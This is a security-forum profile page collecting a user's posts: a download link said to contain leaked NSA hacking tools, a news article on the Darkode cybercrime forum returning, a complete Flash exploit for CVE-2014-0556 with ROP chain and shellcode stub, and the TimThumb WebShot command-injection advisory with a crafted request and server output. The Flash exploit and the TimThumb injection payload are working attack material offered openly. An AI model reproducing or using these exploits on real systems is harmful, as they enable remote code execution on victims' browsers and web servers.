-
Posts
8 -
Joined
-
Last visited
Recent Profile Visitors
2007 profile views
sniffer's Achievements
Newbie (1/14)
21
Reputation
-
NSA's Hacking Group Hacked! Bunch of private hacking tools leaked online.
sniffer replied to a topic in Stiri securitate
https://mega.nz/#!zEAU1AQL!oWJ63n-D6lCuCQ4AY0Cv_405hX8kn7MEsa1iLH5UjKU -
Illegal malware marketplace and hacker forum Darkode is back online, weeks after a US-European sting operation claimed to have arrested those behind it. At the time of the takedown, announced 15 July, Europol estimated that between 250-300 members were using "the most prolific English-speaking cybercriminal forum to date… to trade and barter their hacking expertise, malware and botnets, and to find partners for their next spam runs or malware attacks". 28 people were arrested at the finale of the 18-month operation, including a 26-year-old from Coventry. But already a holding site, darkcode.cc, is live and advertising its new and improved services, showing you can't keep a dedicated hacker down. A post on the homepage not only reveals that the ringleaders are still operational and not behind bars, but offers up instructions to the marketplace to ensure customers don't get itchy feet. The first of two posts says: "Most of the staff is intact, along with senior members. It appears the raids focused on newly added individuals or people that have been retired from the scene for years." It goes on to confirm the forum will be "back in onion land" -- referring to secure, anonymous router Tor -- in an invite-only format. A "generate onion" button sits on the page, but is currently not operational. Knowing the eyes of the law are squarely on it, the forum claims it will only accept known members it can confirm - authentication will be made using the Blockchain API. Like Silk Road 2.0 before it, all this is designed to attract users back and assure them their details will be secure after the raid, with the post continuing: "We will not store any form of user information except a hash of the BTC Guid, a BTC Wallet, and an alias if the user chooses to create one." It warns members to avoid anyone publicly claiming to be a member, and anyone who joined Darkode in the last six to eight months (they'll likely be an informant). "We believe full disclosure on how the new forum will function is necessary to allow members to have confidence in its security. Our mission is to cast out any doubts in the setup as well as allow the world to critique the new system." As spotted by the Register, 21-year-old UK programmer and malware analyst MalwareTech seems to have the inside track on the site operators, and has backed up suggestions that the main admin at Darkode was not arrested in the July raid made by the FBI and European Cybercrime Centre. "Originally the main admin known as 'Sp3cial1st' had posted a statement on pastebin declaring that he wanted to wait and see who all of the 70 users arrested were before bringing the forums back online," writes MalwareTech. Sp3cial1st launched darkcode.cc as a holding page a few hours after that statement, though. The new format, with all members having their own onion address, "would allow the darkode admins greater control over who gets access, preventing people from accessing a hacked account without the owner's onion url," writes MalwareTech. "It would also allow them to better monitor who views what by creating an individual log file for each onion, meaning they could quickly weed out leakers." "Even more interesting it states that bitcoin wallets would be tied to accounts and used for users to authenticate on the forums, this would mean that hackers could not use a hacked account to scam with unless they know the user's private key." Source : Hacker forum Darkode is back and more secure than ever (Wired UK)
-
CVE-2014-0556 : Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow ? Packet Storm /* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* (1728.eb0): Break instruction exception - code 80000003 (first chance) eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63048 cc int 3 1:020> dd esp l4 08d63048 cccccccc cccccccc cccccccc cccccccc 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63049 cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304a cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304b cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304c cc int 3 */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145") private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint private var vtable:uint private var flash:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0;; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0;; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000;; i2++) { if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) { vector = ob[i1][0xFFFFFFFF - i2 + 11] break } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) { vector = ob[i1][i2 + 11] break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0;; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } }
-
- 1
-
exploit : http://www.exploit-db.com/exploits/33851/ news : Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk - The Hacker News Dork : inurl:"/themify/" intitle:"index of /" ###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day) # Affected website : a lot Wordpress Themes, Plugins, 3rd party components # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : June 24, 2014 # # Special Thanks to 2600 Thailand group # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ TimThumb is a small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications. Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes. http://www.binarymoon.co.uk/projects/timthumb/ https://code.google.com/p/timthumb/ The original project WordThumb 1.07 also vulnerable ( https://code.google.com/p/wordthumb/) They both shared exactly the same WebShot code! And there are several projects that shipped with "timthumb.php", such as, Wordpress Gallery Plugin https://wordpress.org/plugins/wordpress-gallery-plugin/ IGIT Posts Slider Widget http://wordpress.org/plugins/igit-posts-slider-widget/ All themes from http://themify.me/ contains vulnerable "wordthumb" in "<theme-name>/themify/img.php". [+] Exploit ============================================================ http:// <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http:// <wp-website>$(<os-cmds>) ** Note that OS commands payload MUST be within following character sets: [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=] ** Spaces, Pipe, GT sign are not allowed. ** This WebShot feature is DISABLED by default. ** CutyCapt and XVFB must be installed in constants. [+] Proof-of-Concept ============================================================ There are couple techniques that can be used to bypass limited charsets but I will use a shell variable $IFS insteads of space in this scenario. PoC Environment: Ubuntu 14.04 LTS PHP 5.5.9 Wordpress 3.9.1 Themify Parallax Theme 1.5.2 WordThumb 1.07 Crafted Exploit: http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat) GET /wp-content/themes/parallax/themify/img.php?webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1 Host: longcatlab.local Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: woocommerce_recently_viewed=9%7C12%7C16; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685 HTTP/1.1 400 Bad Request Date: Tue, 24 Jun 2014 07:20:48 GMT Server: Apache X-Powered-By: PHP/5.5.9-1ubuntu4 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 3059 Connection: close Content-Type: text/html … <a href='http://www.php.net/function.getimagesize' target='_new'>getimagesize</a> ( )</td><td title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php' bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr> </table></font> <h1>A WordThumb error has occured</h1>The following error(s) occured:<br /><ul><li>The image being resized is not a valid gif, jpg or png.</li></ul><br /><br />Query String : webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version : 1.07</pre> Even it response with error messages but injected OS command has already been executed. $ ls /tmp/longcat -lha - -rw-r--r-- 1 www-data www-data 0 ??.?. 24 14:20 /tmp/longcat [+] Vulnerability Analysis ============================================================ https://timthumb.googlecode.com/svn/trunk/timthumb.php Filename: timthumb.php if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt'); if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); ... timthumb::start(); ? start script ... public static function start(){ $tim = new timthumb(); ? create timthumb object, call __construct() ... $tim->run(); ... public function __construct(){ ... $this->src = $this->param('src'); ? set "src" variable to HTTP GET "src" parameter … if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ ... $this->isURL = true; ? prefix http/s result in isURL = true } ... protected function param($property, $default = ''){ if (isset ($_GET[$property])) { return $_GET[$property]; ... public function run(){ if($this->isURL){ ... if($this->param('webshot')){ ? HTTP GET "webshot" must submitted if(WEBSHOT_ENABLED){ ? this pre-defined constant must be true ... $this->serveWebshot(); ? call webshot feature } else { ... protected function serveWebshot(){ ... if(! is_file(WEBSHOT_CUTYCAPT)){ ? check existing of cutycapt return $this->error("CutyCapt is not installed. $instr"); } if(! is_file(WEBSHOT_XVFB)){ ? check existing of xvfb return $this->Error("Xvfb is not installed. $instr"); } ... $url = $this->src; if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ? check valid URL #LoL return $this->error("Invalid URL supplied."); } $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url); ? check valid URL as specified in RFC 3986 http://www.ietf.org/rfc/rfc3986.txt ... if(WEBSHOT_XVFB_RUNNING){ putenv('DISPLAY=:100.0'); $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ? OS shell command injection } else { $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ? OS shell command injection } ... $out = `$command`; ? execute $command as shell command "PHP supports one execution operator: backticks (``). Note that these are not single-quotes! PHP will attempt to execute the contents of the backticks as a shell command." - http://www.php.net//manual/en/language.operators.execution.php "$url" is failed to escape "$()" in "$command" which is result in arbitrary code execution. Jabber : Sniffer@jabber.ru Skype : Ali_Sniffer
- 1 reply
-
- 1